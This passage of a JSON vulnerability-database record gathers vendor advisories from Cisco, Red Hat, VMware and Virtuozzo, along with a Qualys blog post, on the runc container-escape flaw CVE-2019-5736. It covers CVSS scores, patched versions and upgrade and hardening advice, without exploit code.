following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc\"]", "modified": "2019-03-15T19:59:44", "published": "2019-02-15T17:00:00", "id": "CISCO-SA-20190215-RUNC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc", "type": "cisco", "title": "Container Privilege Escalation Vulnerability Affecting Cisco Products: February 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n \n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to these updated packages.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-26T14:32:43", "published": "2019-02-26T14:31:21", "id": "RHSA-2019:0408", "href": "https://access.redhat.com/errata/RHSA-2019:0408", "type": "redhat", "title": "(RHSA-2019:0408) Important: OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open-source engine that automates the deployment of any application as a lightweight, portable, self-sufficient container that runs virtually anywhere.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information, can be found in the vulnerability article linked from the Reference section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-11T19:28:04", "published": "2019-02-11T19:26:20", "id": "RHSA-2019:0304", "href": "https://access.redhat.com/errata/RHSA-2019:0304", "type": "redhat", "title": "(RHSA-2019:0304) Important: docker security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T10:21:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via `systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services (BZ#1695689)", "modified": "2019-05-07T08:05:58", "published": "2019-05-07T07:39:11", "id": "RHSA-2019:0975", "href": "https://access.redhat.com/errata/RHSA-2019:0975", "type": "redhat", "title": "(RHSA-2019:0975) Important: container-tools:rhel8 security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:18", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "\n", "edition": 6, "modified": "2019-02-22T00:00:00", "published": "2019-02-15T00:00:00", "id": "VMSA-2019-0001", "href": "https://www.vmware.com/security/advisories/VMSA-2019-0001.html", "title": "VMware product updates resolve mishandled file descriptor vulnerability in runc container runtime.", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:07", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. The patch applies to all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5.\n**Vulnerability id:** PSBM-91042\nIt was discovered that a malicious user logged in to a Virtuozzo container could potentially overwrite the 'vzctl' binary on the host. The attacker could replace executables in that container with symlinks to '/proc/self/exe'. After that, 'vzctl exec' called from the host to run one of such executables would try to run the host's 'vzctl' there instead. If the attacker managed to intercept that, they would be able to change the contents of the host's 'vzctl' binary. The issue is similar to CVE-2019-5736, but affects 'vzctl' rather than 'runc'.\n\n", "edition": 1, "modified": "2019-02-12T00:00:00", "published": "2019-02-12T00:00:00", "id": "VZA-2019-008", "href": "https://help.virtuozzo.com/s/article/VZA-2019-008", "title": "Important kernel security update: Virtuozzo ReadyKernel patch 72.0 for all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5", "type": "virtuozzo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-02-20T09:45:54", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "Despite the huge advantages that containers offer in application portability, acceleration of CI/CD pipelines and agility of deployment environments, the biggest concern has always been about isolation. Since all the containers running on a host share the same underlying kernel, any malicious code breaking out of a container can compromise the entire host, and hence all the applications running on the host and potentially in the cluster.\n\nThat fear of container isolation failing to hold up turned out to be true yesterday when a vulnerability in runC was announced. runC is the key and most popular software component that most container engines rely on for spinning up containers on a host. The announced vulnerability allows an attacker to break out of the container isolation through a well-crafted attack (technical details of the vulnerability and the exploit are at _<https://seclists.org/oss-sec/2019/q1/119>_) and compromise the entire host. The vulnerability is particularly nasty because it is not covered by the default AppArmor or SELinux kernel-enforced sandboxing policies.\n\n### What can you do to protect your containerized applications?\n\nEven though the exploit is tricky to execute, the exploit code will be released publicly on **February 18**, so it\u2019s best to protect your container environment by doing the following:\n\n 1. Know which nodes (Docker hosts) you are running the containers, and if you are running a vulnerable version of Docker Engine. If you are a Qualys customer, you can use AssetView to get that information. Docker has released the patch in version 18.09.2. \n\n\n 2. Upgrade your Docker hosts to version 18.09.2.\n 3. For hosts managed by public cloud service providers, please keep a close watch on how they are addressing the issue. \nGCP - <https://cloud.google.com/kubernetes-engine/docs/security-bulletins> \nAWS - <https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>\n 4. Qualys is working on releasing the following detections (QIDs), and more vendor-specific QIDs will be launched in the coming days. \n\n** 237121 **: Red Hat Update for docker (RHSA-2019:0304) \n** 237120 **: Red Hat Update for runc (RHSA-2019:0303) \n** 351500 **: Amazon Linux Security Advisory for docker: ALAS-2019-1156 \n** 371641 **: Runc Container Breakout Vulnerability\n\nYou can get more details at [Qualys Threat Protection](<https://threatprotect.qualys.com/2019/02/11/runc-container-escape-vulnerability-cve-2019-5736/>).\n\n### What to do in the future?\n\nIt\u2019s good to be concerned about any new technology while it matures, but it\u2019s equally important to harden the application build and deployment workflows in order to prevent the attacker from getting an easy lead into exploiting the deployed containers.\n\n 1. Ensure that only those container images that have gone through the defined compliance checks (related to vulnerabilities, packages, etc.) are deployed in production. As an example, you can use the Qualys Container Security solution to promote only those built images that pass the compliance checks on the build nodes. \n\n\n 2. Privileged containers, if compromised, can bring down the entire container cluster. Hence, keep a close watch on all privileged containers running in your environment. \n\n\n\n(Asif Awan is CTO for Container Security at Qualys)", "modified": "2019-02-12T15:46:10", "published": "2019-02-12T15:46:10", "id": "QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465", "href": "https://blog.qualys.com/securitylabs/2019/02/12/runc-container-breakout-vulnerability", "type": "qualysblog", "title": "RunC Container Breakout Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
